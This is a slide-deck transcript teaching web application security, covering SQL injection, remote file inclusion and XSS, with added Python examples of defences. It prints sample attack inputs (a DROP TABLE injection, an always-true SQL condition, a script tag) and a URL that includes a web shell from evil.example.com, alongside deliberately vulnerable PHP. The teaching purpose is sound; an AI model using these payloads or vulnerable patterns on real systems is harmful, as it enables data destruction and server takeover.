Web Application Security

Describing the reasons and history for web applications, as well as common injections and how to avoid them.

Transcript

  • 1. Web Application Security
    Slides by: Ynon Perek, ynon@ynonperek.com, http://ynonperek.com
    Monday, April 29, 13
  • 2. Agenda
    • Intro to Web Security
    • Web Application Architecture
    • Code Injections
    • Request Forgeries
    • Losing Trust
  • 3. Reasons for Security
  • 4. Reasons for Security
    • Reliable systems are secure
    • Security of a system = security of the weakest part
    • Hard to fix after the system is ready
    • Everyone should care
  • 5. How It All Started
    • John Draper (Cap'n Crunch)
    • Phreaking in the 70s
  • 6. How It All Started
    • 1986: Brain
    • 1988: Morris
    • Both (meant as) harmless
    • Led to CERT
  • 7. How It All Started
    • The 90s gave birth to phishing attacks
    • AOL was the first victim
  • 8. How It All Started
    • Security became an issue
    • 2003: summer of worms
    • Blaster, Nachi, SoBig
  • 9. IT Security Today
    Headline: "NPR.org Hacked; Syrian Electronic Army Takes Responsibility", April 16,
  • 10. IT Security Today
  • 11. IT Security Today
  • 12. IT Security Today
    Headline (translated from Hebrew): "How scary: all you need to bring down a plane is an Android." One comment. By Noa Zehavi Raz, 12 April 2013, 10:04. Filed under: information security, mobile. A hacker discovered that control-tower software has a serious security hole: the pilot has no way of knowing who is really sending him the message. Using an application he developed, it is possible to take over a plane and even crash it.
  • 13. Why Is It Hard?
    • Secure code problems:
    • Lack of knowledge
    • Carelessness
  • 14. Secure From The Start
    • Fixing security errors after coding is expensive
    • Writing secure code is easy
  • 15. Q & A
  • 16. Web Applications
  • 17. Web Architecture
    Diagram: the client sends a GET for data; the server sends back the response.
  • 18. Server Side
    • Creates data and sends it back to the client
    • Data can be HTML, JSON, XML, images and more
    • Choose your flavor
  • 19. Server Side Flaws
    • Code injections
    • Information leak
  • 20. Client Side
    • The web browser takes the data and renders it on screen
    • Browsers: IE, Firefox, Chrome, Safari
    • Languages: JavaScript, ActionScript, Java (applets)
  • 21. Client Side Flaws
    • Code injections
    • Information leak
  • 22. Web Weakness
    • The client-server gap is too easy
    • HTTP is stateless
    • Many different technologies and vendors
    • Code and data intermix
    • It's way more complicated than it looks
  • 23. Code Injections
    • Query injections (SQL, XPath, LDAP)
    • Remote File Inclusion
    • JavaScript injections (XSS, CSRF)
  • 24. SQL Injections
    • Started in 1999
    • (Probably) the most famous technique
    • 83% of data breaches 2005-2011
    • Attack rate: 70 attempts / hour
  • 25. Famous Victims
    • (2002) guess.com revealed 200K customer names and credit cards
    • (2007) Microsoft UK defacement
    • (2009) RockYou DB hacked for 30 million users
    • (2011) MySql.com hacked
    • (2012) Yahoo lost 450K login credentials
  • 26. SQL Injections
  • 27. What Did Bobby Break
        # the user's string is pasted straight into the SQL (Perl concatenates with ".")
        $query = "SELECT name, grade " .
                 "FROM students " .
                 "WHERE name = $user";
  • 28. What Did Bobby Break
        $query = "SELECT name, grade " .
                 "FROM students " .
                 "WHERE name = Robert; DROP TABLE students";
    Expected data, got code
  • 29. SQLi Examples
    • See if you can log in
    • Login form code: https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/Login.pm
  • 30. SQLi Example
    • See if you can print out names and passwords
    • https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/SQLInjection/InfoLeak.pm
  • 31. Affected Languages
    • All programming languages
    • Usually found in ASP, Java, Perl and PHP
  • 32. Bug Spotting
    • Search for code that:
    • Takes user input
    • Does not validate input
    • Uses input to talk to the DB
  • 33. Bug Spotting
    • In code review
    • Find DB code
    • Make sure its input is sanitized
  • 34. Black-Box Spotting
    • Many automated tools will help you find SQL injections
    • Popular: Havij, http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/
  • 35. How To Avoid
    • Use prepared statements
    • Demo:
        SELECT name, grade FROM students WHERE name = ?
      The ? placeholder is later bound to the data
  • 36. How To Avoid
    • Sanitize your input. Always.
    • Demo:
        # allow only lowercase letters for a name and only digits for an age;
        # anything else is rejected before it gets near the database
        if ( $name !~ /^[a-z]+$/ ) {
            die "Invalid Input";
        }
        if ( $age !~ /^[0-9]+$/ ) {
            die "Invalid Input";
        }
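The following Python script is an added example written for this transcript; it is not code from the deck or from the web-security-demos repository. It puts slides 27-28, 35 and 36 side by side on a constructed in-memory SQLite table: the concatenated query leaks every row when given a quote-closing input, the prepared statement with a bound ? treats the same input as plain data, and an allow-list regex rejects it outright. The table contents, the hostile input and the function names are assumptions made for the example.

```python
import re
import sqlite3

# Constructed sample table (not from the slides): three students and their grades.
STUDENTS = [("alice", 90), ("robert", 75), ("carol", 88)]


def make_db():
    """Build an in-memory students table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (name TEXT, grade INTEGER)")
    conn.executemany("INSERT INTO students VALUES (?, ?)", STUDENTS)
    return conn


def lookup_unsafe(conn, user):
    """String concatenation, as on slide 27: whatever the user typed becomes SQL."""
    query = "SELECT name, grade FROM students WHERE name = '" + user + "'"
    return conn.execute(query).fetchall()


def lookup_prepared(conn, user):
    """Prepared statement, as on slide 35: the ? is bound to data after the SQL is parsed."""
    return conn.execute(
        "SELECT name, grade FROM students WHERE name = ?", (user,)
    ).fetchall()


NAME_RE = re.compile(r"[a-z]+")


def validate_name(name):
    """Allow-list validation, as on slide 36: only lowercase letters get through."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("Invalid Input")
    return name


def demo():
    conn = make_db()
    honest = "robert"
    # Constructed hostile input: closes the quote and appends an always-true condition.
    hostile = "x' OR '1'='1"
    return {
        "unsafe_honest": lookup_unsafe(conn, honest),
        "unsafe_hostile": lookup_unsafe(conn, hostile),      # leaks every row
        "prepared_hostile": lookup_prepared(conn, hostile),  # no such student: []
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

The point of the script is the contrast in the last two dictionary entries: the same bytes are code in one query and data in the other, which is exactly why the prepared statement, not escaping, is the primary defence; the regex check is the extra layer the deck asks for on top of it.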
  • 37. Extra Precautions
    • Keep users' passwords hashed in the DB
    • Encrypt important data in the DB
    • Microsoft URLScan
    • TrustWave ModSecurity (open source)
  • 38. Q & A: SQL Injections
  • 39. Remote File Inclusion
    • Users upload files
    • Some files are dangerous
    • OR
    • Server loads files based on user input
  • 40. The Risk
        <?php
        if ( isset( $_GET['COLOR'] ) ) {
            // the request decides which file gets included
            include( $_GET['COLOR'] . '.php' );
        }
        ?>
    With /vulnerable.php?COLOR=http://evil.example.com/webshell.txt
  • 41. Local File Inclusion
    • Other bugs allow an attacker to upload a PHP file to your server
    • Usually missing upload file name tests
  • 42. Demo: imgur
  • 43. The Risk
    Diagram: a client uploads editor.php through upload.php; the server saves it as uploads/editor.php
  • 44. Remote File Demo
        if ($_POST['url']) {
            $uploaddir = $_POST['url'];          // upload directory taken from the request
        }
        $first_filename = $_FILES['uploadfile']['name'];
        $filename = md5($first_filename);
        // extension copied from the client's file name and never checked
        $ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
        $file = $uploaddir . basename($filename . '.' . $ext);
        if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
            echo basename($filename . '.' . $ext);
        } else {
            echo 'error';
        }
  • 45. Example: OpenBB
    PHP remote file inclusion vulnerability in Open Bulletin Board (OpenBB) 1.0.8 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) index.php and possibly (2) collector.php. CVE-2006-4722
  • 46. Bug Spotting
    • Search for code that loads external files
    • Search for code that stores external files
    • Make sure the file name is sanitized
  • 47. How To Avoid
    • Avoid by sanitizing your input
    • Don't allow uploads if you don't have to
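An added Python example, not from the deck or from OpenBB: the two defences slides 46-47 ask for, applied to the slide 40 and slide 44 patterns. The include target is looked up in a fixed allow-list instead of being built from the request, and uploaded files get a server-chosen directory, an extension allow-list and a random stored name, so the client's file name (including any directory part or a second extension hidden in it) never decides where or as what the file is stored. The allow-list contents, the directory name and the function names are assumptions made for the example.

```python
import os
import secrets

# Allow-lists constructed for this example: what the server is willing to accept.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
ALLOWED_THEMES = {"red", "blue", "green"}   # hypothetical valid COLOR values


def theme_file(color):
    """Replace include($_GET['COLOR'] . '.php') with a lookup in a fixed allow-list.
    A URL or a path can never reach include(), because it is simply not a key here."""
    if color not in ALLOWED_THEMES:
        raise ValueError("unknown theme: " + repr(color))
    return color + ".php"


def safe_upload_path(upload_dir, original_name):
    """Decide where an uploaded file may be stored.
    Fixes the three problems of the slide 44 demo: the directory is chosen by the
    server, the extension is checked against an allow-list, and the stored name is
    random, so the client's name (and any directory part in it) is discarded."""
    # Drop any directory component the client sent, on either slash style.
    base = os.path.basename(original_name.replace("\\", "/"))
    if "." not in base:
        raise ValueError("missing extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: " + repr(ext))
    stored = secrets.token_hex(16) + "." + ext
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, stored))
    # Belt and braces: confirm the final path is still inside the upload directory.
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("path escapes upload directory")
    return dest


if __name__ == "__main__":
    print(theme_file("red"))
    print(safe_upload_path("uploads", "../shell.png"))
    for bad in ("editor.php", "shell.php.png", ".htaccess"):
        try:
            print(bad, "->", safe_upload_path("uploads", bad))
        except ValueError as err:
            print(bad, "rejected:", err)
```

Note that "shell.php.png" is accepted, because its last extension is on the allow-list; the random stored name is what makes that harmless, since the server never writes a file whose name the client chose. Whether a ".png" that is really a PHP script can still do damage depends on the web server never executing files from the upload directory, which is a deployment setting this script cannot enforce.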
  • 48. Other Injections
    • XPath Injection
    • LDAP Injection
  • 49. Demo
    • Try to find a company's id using: https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XPathInjection/Leak.pm
  • 50. Client-Side Injections
    • A relatively new category of injections uses client-side languages (mainly JavaScript)
    • The attacker uses the website to attack other users
  • 51. JavaScript Injections
    Diagram: the evil hacker sends a message to the honest user through the web application (email); the message includes evil JS code
  • 52. JavaScript Security
    • Browsers use a security policy called "Same Origin Policy"
    • A page has an origin
    • Some actions are restricted to the page's origin
  • 53. JavaScript Risks
    • Same Origin Policy protects the following:
    • Unauthorized access to cookies
    • Unauthorized access to canvas
    • Unauthorized AJAX calls
  • 54. Famous Injections
    • XSS is the most famous JavaScript injection
    • Variants: inject code into Flash
  • 55. Famous Injections
  • 56. Famous Injections: Twitter, Sep 2010
  • 57. Famous Injections: Yahoo, Jan 2013
  • 58. Famous Injections
    • "Samy Is My Hero"
    • (2005) Samy's worm infected a million accounts in less than 20 hours
  • 59. Famous Injections
  • 60. Examples
    • Throwing users out of a public chat room
    • Getting a user to send a "fake" message
    • https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/JSInjection/Chatter.pm
  • 61. Examples
    • Hijacking a user's session through messaging
    • Getting a user to send a fake message
    • https://github.com/ynonp/web-security-demos/blob/master/lib/WebSecurity/Demos/Controller/XSS/SessionHijack.pm
  • 62. Bug Spotting
    • Search for code that writes markup to the user
    • Verify all output is sanitized
  • 63. Bug Spotting
    • http://xsser.sourceforge.net/
    • Python script that detects XSS bugs in sites
  • 64. Avoiding The Bug
    • Use the framework
    • Sanitize your output
    • Consider other users
  • 65. Q & A: Client-Side Injections
  • 66. Code Weak Spots
    • Injections are more likely to occur in:
    • Cookies
    • HTTP headers
    • Don't forget to sanitize these too
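An added Python example (not from the deck or its demo repository): output escaping for chat-style markup of the kind slides 60-62 and 64 discuss, plus the header and cookie handling that slide 66 and slide 53 point at. The function names, the markup shape and the sample payload are constructed for the example; nothing here is the framework's own API.

```python
import html
import re

# A CR or LF inside a header value ends that header line early.
CRLF = re.compile(r"[\r\n]")


def render_chat_line_unsafe(user, text):
    """Markup written straight from user data: the pattern slide 62 tells you to hunt for."""
    return "<li><b>" + user + "</b>: " + text + "</li>"


def render_chat_line(user, text):
    """Same markup, but every user-controlled value is escaped for the HTML text context.
    html.escape(quote=True, the default) also covers the quoted-attribute context."""
    return "<li><b>" + html.escape(user) + "</b>: " + html.escape(text) + "</li>"


def header_value(value):
    """Header and cookie values are injection points too (slide 66): a CR/LF in a value
    would let the sender append headers of its own, so reject it instead of passing it on."""
    if CRLF.search(value):
        raise ValueError("CR/LF not allowed in header value")
    return value


def session_cookie_header(session_id):
    """Set-Cookie with HttpOnly, so script running in the page cannot read the session
    cookie (the cookie-access risk slide 53 lists), plus Secure and SameSite."""
    sid = header_value(session_id)
    return "Set-Cookie: session=" + sid + "; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    # Constructed message from a hostile chat participant.
    payload = "<script>alert(1)</script>"
    print(render_chat_line_unsafe("mallory", payload))
    print(render_chat_line("mallory", payload))
    print(session_cookie_header("abc123"))
```

The escaping is per output context: html.escape is right for text between tags and for quoted attribute values, but a value dropped into a script block, a URL or a CSS rule needs the encoder for that context, which is the practical reason behind "use the framework" on slide 64.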
  • 67. Web Security
    • Security of a system = the weakest part
    • System breaches usually involve more than one vulnerability
    • Use the power of frameworks
  • 68. Thanks For Listening
    • Ynon Perek
    • http://ynonperek.com
    • ynon@ynonperek.com